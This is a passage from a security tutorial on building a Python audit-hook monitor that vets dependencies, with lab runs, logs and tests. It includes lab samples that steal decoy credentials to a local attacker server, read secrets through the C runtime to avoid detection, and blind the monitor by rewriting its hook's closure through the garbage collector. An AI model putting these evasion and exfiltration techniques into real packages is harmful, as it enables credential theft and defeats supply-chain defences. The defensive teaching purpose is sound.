show(run_python(["auditwatch.py", "--mode", "record", "--allow-net", allowed, "--report", "out/allownet.json",
                 "--import", "quickcolors"], collector.port), collector)
collector.close()

Block mode raises an exception inside the package

=== block mode
auditwatch: imported quickcolors in block mode, 214 events seen
  read-secret   fixtures/pkgs/quickcolors/__init__.py:26
      fixtures/lab_home/.aws/credentials
exit code: 3 | bodies received by the attacker server: 0

The attacker’s server received nothing, so the credential theft was stopped. But look at the report: only the first action, read-secret, appears, and there is no import error line. The hook raised AuditViolation inside the toy’s read_text() call, and the toy’s except Exception: pass swallowed it and quietly gave up. From the outside the import looks like a success. A monitor that treated “the import did not raise” as “the package is fine” would have given this package a clean bill of health. The monitor avoids that because the hook records the finding before it raises, so the exit code is 3 whether or not the package hides the exception.

Kill mode ends the process

=== kill mode

exit code: 86 | bodies received by the attacker server: 0

report written before the process died: [('read-secret', 'open')]

In kill mode the child printed nothing at all. The hook wrote the report, then called os._exit(86), which ends the process immediately with no cleanup, no finally blocks and no chance for the package to continue. The report on disk lists what was caught. This matches the documentation’s advice for sys.audit(): “if an exception is raised, it should not be handled and the process should be terminated as quickly as possible”. Use record mode to learn what a package does, and kill mode to enforce a decision in CI.

Allow-lists make exceptions explicit

=== record mode with one endpoint allowed
stage-2 loader ran
auditwatch: imported quickcolors in record mode, 251 events seen
  read-secret   fixtures/pkgs/quickcolors/__init__.py:26
      fixtures/lab_home/.aws/credentials
      fixtures/lab_home/.env
  spawn         fixtures/pkgs/quickcolors/__init__.py:31
      subprocess.Popen whoami
      _winapi.CreateProcess
  dynamic-code  fixtures/pkgs/quickcolors/__init__.py:32
      exec of code from <string>
exit code: 3 | bodies received by the attacker server: 1

Some packages legitimately talk to a known server. --allow-net HOST:PORT silences the network rule for exactly that endpoint (here the port of your local server, which is why the driver builds the value at run time), and --allow RULE silences a whole rule. In the output the network lines are gone while read-secret, spawn and dynamic-code still fire. Because this run used record mode, the upload happened and the server received one body. An allow-list entry is a decision to trust something, so keep each one as narrow as you can.

Step 6: Where the tripwire fails

This is the part most tutorials skip. Each experiment below targets a gap that the Python documentation warns about, and each one is reproducible. Run python step6_limits.py after saving the files in this step. (If you are not on Windows, skip the first experiment and the nativeread package.)

Gap one: reads that never call open()

Step 1 already showed that environment variables raise no events, so a package can read every secret in os.environ without the monitor noticing. The upload still needs the network, which is why the network rule is your most reliable catch. The second gap is native code. This package reads the decoy .env file through the Windows C runtime (_open and _read from msvcrt) instead of Python’s open():

# fixtures/pkgs/nativeread/__init__.py
"""nativeread: reads a decoy secret with the C runtime instead of open(). Windows-only lab sample."""
import ctypes
import os
from pathlib import Path


def _c_read(path):
    crt = ctypes.cdll.msvcrt
    fd = crt._open(str(path).encode("mbcs"), 0)       # _O_RDONLY
    buf = ctypes.create_string_buffer(4096)
    count = crt._read(fd, buf, 4096)
    crt._close(fd)
    return buf.raw[:count]


try:
    SECRET = _c_read(Path(os.environ["LAB_HOME"]) / ".env")
except Exception:
    SECRET = b""

Gap two: a package that blinds the monitor

The second package attacks the monitor itself. A hook is just a Python function in memory. gc.get_objects() returns every object the garbage collector tracks, so the package can find any function named hook that has a closure, reach into its closure cells, and add every rule to the allow set. After that the hook judges everything as allowed. Then it imports quickcolors, which does its work.

# fixtures/pkgs/gcbypass/__init__.py
"""gcbypass: tries to blind the monitor before it misbehaves. A lab sample."""
import gc

ALL_RULES = ["read-secret", "write-persist", "network", "spawn", "dynamic-code", "native-call", "tamper"]


def _blind_the_monitor():
    for obj in gc.get_objects():                       # find any function named "hook" with a closure
        if getattr(obj, "__name__", "") == "hook" and getattr(obj, "__closure__", None):
            for cell in obj.__closure__:
                if isinstance(cell.cell_contents, set):
                    cell.cell_contents.update(ALL_RULES)   # "allow" every rule


try:
    _blind_the_monitor()
    import quickcolors   # noqa: F401  (now do what quickcolors does)
except Exception:
    pass

Gap three: an earlier hook can veto yours

The documentation says “If any existing hooks raise an exception derived from RuntimeError, the new hook will not be added and the exception suppressed. As a result, callers cannot assume that their hook has been added unless they control all existing hooks.” This script installs a gatekeeper hook that vetoes any later hook, tries to add a second hook, and then calls auditwatch.install(). It runs once with an AuditViolation (a RuntimeError) and once with a ValueError.

# step6b_addhook.py
"""Can one hook stop a later hook from being added? Depends on the exception type it raises."""
import sys

import auditwatch

KIND = {"runtime": auditwatch.AuditViolation, "value": ValueError}[sys.argv[1]]
later_events = []


def gatekeeper(event, args):
    if event == "sys.addaudithook":
        raise KIND("no second hook, thanks")


def later_hook(event, args):
    later_events.append(event)


sys.addaudithook(gatekeeper)
try:
    sys.addaudithook(later_hook)
    print(f"{KIND.__name__}: addaudithook returned normally")
except Exception as exc:
    print(f"{KIND.__name__}: addaudithook raised {type(exc).__name__}: {exc}")
open(__file__).close()
print(f"{KIND.__name__}: later hook saw {len(later_events)} events")
try:
    auditwatch.install()
except RuntimeError as exc:
    print(f"{KIND.__name__}: auditwatch.install() refused to continue: {exc}")

Now the driver that runs all three experiments:

# step6_limits.py
"""Step 6: what an audit hook cannot see, and what a hostile package can do to the monitor."""
import subprocess
import sys

from labenv import LAB, Collector, clean, run_python


def monitor(args, collector):
    result = run_python(["auditwatch.py", *args], collector.port)
    return clean(result.stdout, collector.port).rstrip(), result.returncode


collector = Collector()
print("=== gap 1: the C runtime reads a secret without calling open()")
read = run_python(["-c", "import nativeread; print(len(nativeread.SECRET), 'bytes read')"], collector.port)
print("unmonitored:", read.stdout.strip())
print(monitor(["--import", "nativeread", "--report", "out/native.json"], collector)[0])
text, code = monitor(["--allow", "native-call", "--import", "nativeread", "--report", "out/native-allowed.json"],
                     collector)
print(text, "| exit code", code)
print()

print("=== gap 2: the package blinds the monitor through the garbage collector")
for label, args in [("record, tamper rule switched off", ["--mode", "record", "--allow", "tamper"]),
                    ("record, default rules", ["--mode", "record"]),
                    ("kill, default rules", ["--mode", "kill"])]:
    collector = Collector()
    text, code = monitor([*args, "--report", "out/gc.json", "--import", "gcbypass"], collector)
    print(f"--- {label}")
    print(text)
    print(f"exit code: {code} | bodies received by the attacker server: {len(collector.received)}")
    collector.close()
print()

print("=== gap 3: which exception stops a later hook from being added")
for kind in ("runtime", "value"):
    result = subprocess.run([sys.executable, "step6b_addhook.py", kind], cwd=LAB, capture_output=True, text=True)
    print(result.stdout.strip())

What the experiments showed

=== gap 1: the C runtime reads a secret without calling open()
unmonitored: 109 bytes read
auditwatch: imported nativeread in record mode, 36 events seen
  native-call   fixtures/pkgs/nativeread/__init__.py:3
      ctypes.dlopen kernel32
      ctypes.dlsym GetLastError
  native-call   fixtures/pkgs/nativeread/__init__.py:9
      ctypes.dlopen msvcrt
  native-call   fixtures/pkgs/nativeread/__init__.py:10
      ctypes.dlsym _open
  native-call   fixtures/pkgs/nativeread/__init__.py:12
      ctypes.dlsym _read
  native-call   fixtures/pkgs/nativeread/__init__.py:13
      ctypes.dlsym _close
auditwatch: imported nativeread in record mode, 29 events seen
  no findings | exit code 0

The unmonitored run proves the package really did read the file: 109 bytes. Under the monitor, nativeread is not flagged by read-secret, because no open event was ever raised. The C runtime opened the file directly. The only thing that gave it away was the native-call rule watching ctypes.dlopen and ctypes.dlsym events (the kernel32 lines at line 3 come from import ctypes itself on Windows). Silence that rule with --allow native-call and the report says “no findings” while the secret has been read. One more detail: the table lists an event called ctypes.call_function, but ordinary calls through a loaded library did not raise it in my test. In the 3.13.14 source I found it raised only by the low-level call_function and call_cdeclfunction helpers in callproc.c. That is why the rule keys on ctypes.dlsym too. This matches the documentation’s advice that ctypes should be “completely removed or closely monitored”.

=== gap 2: the package blinds the monitor through the garbage collector
--- record, tamper rule switched off
stage-2 loader ran
auditwatch: imported gcbypass in record mode, 251 events seen
  no findings
exit code: 0 | bodies received by the attacker server: 1
--- record, default rules
stage-2 loader ran
auditwatch: imported gcbypass in record mode, 253 events seen
  tamper        fixtures/pkgs/gcbypass/__init__.py:9
      gc.get_objects
exit code: 3 | bodies received by the attacker server: 1
--- kill, default rules

exit code: 86 | bodies received by the attacker server: 0

These three runs are the heart of the tutorial. With the tamper rule switched off (the first run) the report is perfectly clean, the exit code is 0, and the attacker’s server holds the stolen files. That is a false clean bill of health, worse than no monitor, because you would trust it. With default rules in record mode (the second run) the hook did record one tamper finding at the moment of the gc.get_objects() call, but the package then blinded the hook, so everything after that went unreported and the upload succeeded. In kill mode (the third run) the process died at the first sign of tampering, before the package could do anything, and the server received nothing. The rule is to treat tamper as fatal, and to use kill mode when it matters. I did not find a way past kill mode using gc in this lab, but I did not try everything, and the documentation’s warning about bypasses stands.

=== gap 3: which exception stops a later hook from being added
AuditViolation: addaudithook returned normally
AuditViolation: later hook saw 0 events
AuditViolation: auditwatch.install() refused to continue: auditwatch: the hook was not installed, an earlier hook vetoed it
ValueError: addaudithook returned normally
ValueError: later hook saw 0 events
ValueError: auditwatch.install() refused to continue: auditwatch: the hook was not installed, an earlier hook vetoed it

Both exception types left the later hook uninstalled with no error, and in both cases auditwatch.install() detected the problem and refused to continue, thanks to the canary: right after registering, install() raises a private event with sys.audit() and checks that its own hook saw it. Without that check, a hostile hook that runs first (for example one planted in a startup file) could leave you running a monitor that never fires and reports “no findings”.

There is also a surprise here. The documentation says only RuntimeError is suppressed and adds “Exceptions derived from Exception but not RuntimeError are no longer suppressed.” On Python 3.13.14 the ValueError was suppressed too. The Python-level sys.addaudithook in sysmodule.c checks for Exception and carries the comment “We do not report errors derived from Exception”, while the C-level PySys_AddAuditHook earlier in the same file checks for RuntimeError. I did not test other Python versions. The practical lesson is to trust measurements over documentation for security decisions, and to prove your hook runs.

Step 7: Check it against real packages

A monitor that flags your toy proves little if it also flags every popular library. This script creates a virtual environment, installs six well-known packages, imports each under the monitor in record mode, and then applies a narrow allow-list for each package that raised a finding. It also times the cost of the hook. Run python step7_survey.py; the first run needs internet access and takes a moment.

# step7_survey.py
"""Step 7: import well-known packages under the monitor and see how many false alarms it raises."""
import json
import subprocess
import sys
import time
import venv
from pathlib import Path

LAB = Path(__file__).resolve().parent
ENV = LAB / "survey_venv"
(LAB / "out").mkdir(exist_ok=True)
PY = ENV / ("Scripts/python.exe" if sys.platform == "win32" else "bin/python")
PACKAGES = ["requests", "rich", "attrs", "jinja2", "numpy", "pydantic"]
IMPORT_NAME = {"attrs": "attr"}                  # the import name differs from the pip name
TUNING = {"requests": ["--allow-net", "::1:0"], "attrs": ["--allow", "dynamic-code"],
          "pydantic": ["--allow", "dynamic-code"], "numpy": ["--allow", "native-call"]}

if not PY.exists():
    venv.create(ENV, with_pip=True)
subprocess.run([str(PY), "-m", "pip", "install", "--quiet", "--disable-pip-version-check", *PACKAGES], check=True)
frozen = subprocess.run([str(PY), "-m", "pip", "list", "--format=freeze"], capture_output=True, text=True).stdout
print("versions:", ", ".join(line for line in frozen.splitlines() if line.split("==")[0].lower() in PACKAGES))
print()
print(f"{'package':<10} {'events':>7}  findings")
details = []
for name in PACKAGES:
    module = IMPORT_NAME.get(name, name)
    report = LAB / "out" / f"survey-{name}.json"
    subprocess.run([str(PY), "auditwatch.py", "--import", module, "--report", str(report)],
                   cwd=LAB, capture_output=True, text=True)
    data = json.loads(report.read_text())
    rules = sorted({f["rule"] for f in data["findings"]})
    print(f"{name:<10} {data['events_total']:>7}  {', '.join(rules) or 'none'}")
    for finding in data["findings"][:3]:
        details.append(f"{name}: {finding['rule']} at {finding['where']} -> {finding['detail']}")
print()
print("\n".join(details))
print()
print("after tuning:")
for name, flags in TUNING.items():
    done = subprocess.run([str(PY), "auditwatch.py", *flags, "--import", IMPORT_NAME.get(name, name),
                           "--report", str(LAB / "out" / "tuned.json")], cwd=LAB, capture_output=True, text=True)
    print(f"  {name:<9} {' '.join(flags):<24} exit code {done.returncode}")


def best_of(cmd, runs=3):
    times = []
    for _ in range(runs):
        start = time.perf_counter()
        subprocess.run(cmd, cwd=LAB, capture_output=True)
        times.append(time.perf_counter() - start)
    return min(times)


plain = best_of([str(PY), "-c", "import numpy"])
watched = best_of([str(PY), "auditwatch.py", "--import", "numpy", "--report", str(LAB / "out" / "overhead.json")])
print()
print(f"import numpy: {plain:.2f}s plain, {watched:.2f}s under auditwatch ({watched / plain:.1f}x)")
versions: attrs==26.1.0, Jinja2==3.1.6, numpy==2.5.3, pydantic==2.13.5, requests==2.34.2, rich==15.0.0

package     events  findings
requests       842  network
rich            14  none
attrs          242  dynamic-code
jinja2         361  none
numpy         1600  native-call
pydantic       883  dynamic-code

requests: network at survey_venv/Lib/site-packages/urllib3/util/connection.py:127 -> socket.bind ::1:0
attrs: dynamic-code at survey_venv/Lib/site-packages/attr/_make.py:227 -> exec of code from <attrs generated __repr__ attr._make.Attribute>
attrs: dynamic-code at survey_venv/Lib/site-packages/attr/_make.py:227 -> exec of code from <attrs generated __eq__ attr._make.Attribute>
attrs: dynamic-code at survey_venv/Lib/site-packages/attr/_make.py:227 -> exec of code from <attrs generated __hash__ attr._make.Attribute>
numpy: native-call at survey_venv/Lib/site-packages/numpy/_core/_internal.py:20 -> ctypes.dlopen kernel32
numpy: native-call at survey_venv/Lib/site-packages/numpy/_core/_internal.py:20 -> ctypes.dlsym GetLastError
pydantic: dynamic-code at survey_venv/Lib/site-packages/typing_inspection/typing_objects.py:112 -> exec of code from <string>
pydantic: dynamic-code at survey_venv/Lib/site-packages/typing_inspection/typing_objects.py:112 -> exec of code from <string>
pydantic: dynamic-code at survey_venv/Lib/site-packages/typing_inspection/typing_objects.py:112 -> exec of code from <string>

after tuning:
  requests  --allow-net ::1:0        exit code 0
  attrs     --allow dynamic-code     exit code 0
  pydantic  --allow dynamic-code     exit code 0
  numpy     --allow native-call      exit code 0

import numpy: 0.12s plain, 0.14s under auditwatch (1.2x)

Four of the six packages tripped a rule just by being imported, and in each case the cause is ordinary code that you can read. Here is why, using the lines the monitor named. requests imports urllib3, whose _has_ipv6() function binds a throwaway IPv6 socket to find out whether the machine supports IPv6; its own comment says “To determine that we must bind to an IPv6 address.” That is a socket.bind to ::1, so the network rule fired. attrs builds methods such as __repr__ by compiling source text and calling eval on the code object, which Python reports as an exec event, and pydantic pulls in typing_inspection, which builds small functions from generated source and runs them with exec. numpy imports ctypes, and on Windows that import alone loads kernel32. rich and jinja2 were clean. The lesson is that a finding is a question, not a verdict: is this behavior expected for this package at this version?

The “after tuning” lines show each allow-list that brought the exit code to 0: one endpoint for requests, the dynamic-code rule for attrs and pydantic, and native-call for numpy. Notice that each entry silences only one rule or one endpoint: the other rules stay active for each of those packages, so an update that suddenly read ~/.aws/credentials would still be caught. Finally, the cost. On my machine import numpy took 0.12 seconds plain and 0.14 seconds under the monitor (best of three runs), a factor of 1.2, which is small enough to leave on in CI. Your numbers will differ.

Step 8: Lock the behavior in with tests

Everything above is only useful if it stays true. These twenty tests run the toy and the benign package through the monitor in child processes and assert the lessons: the toy really does exfiltrate when nobody is watching, the benign package is clean even though exec events fire, block mode stops the upload while the import still succeeds, kill mode exits with 86 and still writes its report, an allow-list silences only what it names, the C runtime read is visible only to native-call, the gc bypass works when tamper is off and is stopped in kill mode, a vetoed install is detected, and nine paths are classified correctly (including .env.example, which is deliberately not treated as a secret, and a .bashrc that is flagged when appended to but not when read).

# test_auditwatch.py
import json
import os
import subprocess
import sys

import pytest

from auditrules import judge
from labenv import LAB, Collector, run_python


@pytest.fixture
def collector():
    server = Collector()
    yield server
    server.close()


def watch(collector, tmp_path, *args):
    report = tmp_path / "report.json"
    result = run_python(["auditwatch.py", *args, "--report", str(report)], collector.port)
    return result, (json.loads(report.read_text()) if report.exists() else None)


def rules(report):
    return {finding["rule"] for finding in report["findings"]}


def test_the_toy_really_exfiltrates_when_nobody_is_watching(collector):
    run_python(["-c", "import quickcolors"], collector.port)
    assert len(collector.received) == 1
    assert "AKIAIOSFODNN7EXAMPLE" in collector.received[0][".aws/credentials"]


def test_benign_package_is_clean_although_exec_events_fire(collector, tmp_path):
    result, report = watch(collector, tmp_path, "--import", "tinytable")
    assert result.returncode == 0 and report["findings"] == []
    assert report["events"]["exec"] > 10          # the import system and dataclasses call exec for it


def test_record_mode_reports_four_behaviours_and_stops_nothing(collector, tmp_path):
    result, report = watch(collector, tmp_path, "--import", "quickcolors")
    assert result.returncode == 3
    assert rules(report) == {"read-secret", "network", "spawn", "dynamic-code"}
    assert len(collector.received) == 1


def test_block_mode_stops_the_upload_but_the_import_still_succeeds(collector, tmp_path):
    result, report = watch(collector, tmp_path, "--mode", "block", "--import", "quickcolors")
    assert result.returncode == 3 and collector.received == []
    assert "import error" not in result.stdout    # the package swallowed AuditViolation itself


def test_kill_mode_exits_86_and_still_writes_the_report(collector, tmp_path):
    result, report = watch(collector, tmp_path, "--mode", "kill", "--import", "quickcolors")
    assert result.returncode == 86 and collector.received == []
    assert report["findings"][0]["rule"] == "read-secret"


def test_allow_net_silences_only_the_network_rule(collector, tmp_path):
    endpoint = f"127.0.0.1:{collector.port}"
    _, report = watch(collector, tmp_path, "--allow-net", endpoint, "--import", "quickcolors")
    assert rules(report) == {"read-secret", "spawn", "dynamic-code"}


def test_allow_flag_silences_a_whole_rule(collector, tmp_path):
    _, report = watch(collector, tmp_path, "--allow", "spawn", "--allow", "dynamic-code", "--import", "quickcolors")
    assert rules(report) == {"read-secret", "network"}


@pytest.mark.skipif(os.name != "nt", reason="nativeread uses the Windows C runtime")
def test_c_runtime_read_is_visible_only_to_the_native_call_rule(collector, tmp_path):
    _, report = watch(collector, tmp_path, "--import", "nativeread")
    assert rules(report) == {"native-call"}
    _, report = watch(collector, tmp_path, "--allow", "native-call", "--import", "nativeread")
    assert report["findings"] == []
    read = run_python(["-c", "import nativeread; print(len(nativeread.SECRET))"], collector.port)
    assert int(read.stdout) > 0                   # the secret really was read


def test_gc_bypass_blinds_the_monitor_when_the_tamper_rule_is_off(collector, tmp_path):
    result, report = watch(collector, tmp_path, "--allow", "tamper", "--import", "gcbypass")
    assert result.returncode == 0 and report["findings"] == []
    assert len(collector.received) == 1


def test_gc_bypass_is_stopped_in_kill_mode(collector, tmp_path):
    result, report = watch(collector, tmp_path, "--mode", "kill", "--import", "gcbypass")
    assert result.returncode == 86 and collector.received == []
    assert report["findings"][0]["rule"] == "tamper"


@pytest.mark.parametrize("path, mode, expected", [
    ("C:/Users/ana/.aws/credentials", "r", "read-secret"),
    ("/home/ana/.ssh/id_ed25519", "rb", "read-secret"),
    ("project/.env", "r", "read-secret"),
    ("project/.env.example", "r", None),
    ("/usr/lib/python3/os.py", "r", None),
    ("/home/ana/.bashrc", "a", "write-persist"),
    ("/home/ana/.bashrc", "r", None),
    ("repo/.github/workflows/ci.yml", "w", "write-persist"),
    ("site-packages/evil.pth", "w", "write-persist"),
])
def test_open_paths_are_classified(path, mode, expected):
    verdict = judge("open", (path, mode, 0))
    assert (verdict[0] if verdict else None) == expected


def test_a_vetoed_install_is_detected_by_the_canary():
    result = subprocess.run([sys.executable, "step6b_addhook.py", "runtime"], cwd=LAB, capture_output=True, text=True)
    assert "refused to continue" in result.stdout

Run python -m pytest -q test_auditwatch.py:

....................                                                                                                                                               [100%]
20 passed in 5.78s

Putting it to work in CI

The monitor is built for one job: vet a dependency before it reaches a machine that holds secrets. In a build, create a throwaway virtual environment, install the new or updated package, and run python auditwatch.py --mode kill --import yourpackage with the job’s real secrets absent. Fail the job on any non-zero exit code (0 means no findings, 3 means findings in record or block mode, 86 means kill mode stopped the import). Keep the JSON report as a build artifact, and when a dependency updates, compare the new report with the old one: a package that has never touched the network and suddenly does is exactly what you want a human to look at.

Common mistakes

Writing a hook that does work. Opening a log file, or calling anything that raises events, calls your hook again. Keep the hook free of side effects or guard it with a flag, as Step 4 showed. Trusting an exception. Block mode raises inside the package’s code, and the package can catch it. Record the finding first, then raise. Assuming your hook is installed. Check it with a canary event, as install() does. Reading exec without asking who called it. The import system produces dozens of them. Believing every event argument. The _winapi.CreateProcess command line in Step 1 was a single control character. Comparing counts across machines. The first import after a source change compiles and writes .pyc files, which adds compile and open events, so only compare runs made under the same conditions. Treating the monitor as a sandbox. Step 6 showed three ways it fails, and the documentation says so directly.

What a tripwire cannot replace

An audit hook added from Python runs in the same process as the code it watches, so a determined package can share its fate and its memory. The documentation’s answer is to add security-sensitive hooks from C before the runtime starts, but for most teams the practical answer is layers. Run installs and first imports in a container or virtual machine with no network and no secrets, which is a much stronger boundary than code running inside the very process it is trying to evade. Pin and verify what you depend on (see the GitHub Actions pinning tutorial and the npm integrity tutorial), scan code you do not run (the npm runtime-malware scanner), and when you must execute code you do not trust, give it a real sandbox such as the one in the WebAssembly with Wasmtime tutorial. The audit hook is the cheap first layer that tells you something is wrong.

Where to go next

Three extensions are worth trying. First, store a baseline report per dependency version and fail the build when a new rule appears. Second, add a rule for something you care about, such as writes outside the project folder, using the event table to find the right event (os.remove, os.rename and shutil.copyfile are listed there). Third, try the bypasses yourself against a stricter monitor, and see whether you can beat kill mode, since that is the best way to learn what the tripwire really guarantees.

Sources

  • Python documentation: sys.addaudithook(), sys.audit() and the audit events table.
  • PEP 578, Python Runtime Audit Hooks, by Steve Dower.
  • Python documentation for the site module, which defines how .pth files execute.
  • CPython 3.13.14 source: Python/sysmodule.c and Modules/_ctypes/callproc.c.

Tags:

Application SecurityAudit HooksMalwarePythonSupply Chain Security

Share

Rows of green pneumatic tubes with handwritten destination labels ending in brass outlets in the National Library of Australia’s tube system
Previous Post

Cloudflare’s OHTTP Gateway Turns Request Privacy Into a Question of Who Runs the Other Hop

A large collection of old iron keys on key rings spread across a wooden floor
Next Post

Apple Says It Will Tighten macOS Full Disk Access Because AI Agents Raise the Stakes

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest
05 Oct
How to Use frozendict in Python 3.15 to Freeze Config and Cache Dictionary Arguments
05 Oct
Kubernetes Node Swap Turns Idle Agent Memory Into a Density Bet With No Wake-Up Test
Trending
October 5, 2026
How to Use frozendict in Python 3.15 to Freeze Config and Cache Dictionary Arguments
October 5, 2026
Kubernetes Node Swap Turns Idle Agent Memory Into a Density Bet With No Wake-Up Test
October 5, 2026
Denmark Says 8.8 Million Population Register Records Were Pulled Through One Company’s Lawful Access
October 5, 2026
How to Prepare Your Python Code for the Python 3.15 UTF-8 Default and Fix Windows Encoding Bugs
October 5, 2026
BT’s TalkTalk Rescue Turns Telecom Continuity Into a New Merger-Control Ground
October 5, 2026
Google Stops Accepting Product Bug Reports for Its Open-Source Bounty, Citing Automated Submissions

Related Posts

A laptop wrapped in a chain and padlock, illustrating least-privilege controls for AI agents.
Learning Hub

How to Secure Tool-Using AI Agents Before They Touch Production

June 8, 2026
Colorful sticky notes arranged on an office wall, symbolizing governance checklists and planning.
Learning Hub

AI Governance for Agentic Apps: A Practical Checklist for Builders

June 8, 2026
A technician connects green fiber optic cables at a data center, representing a private production inference endpoint.
Learning Hub

How to Deploy a Fine-Tuned LLM Behind a Private Production Inference Endpoint

June 8, 2026
Narrow aisle behind black supercomputer racks in a data center
Learning Hub

Kubernetes SELinux Volume Labeling: What Cluster Operators Should Audit Before v1.37

June 8, 2026
SXZ.io SXZ.io
  • [email protected]

Categories

Articles
Learning Hub
News

All Rights Reserved by SXZ.io ©2026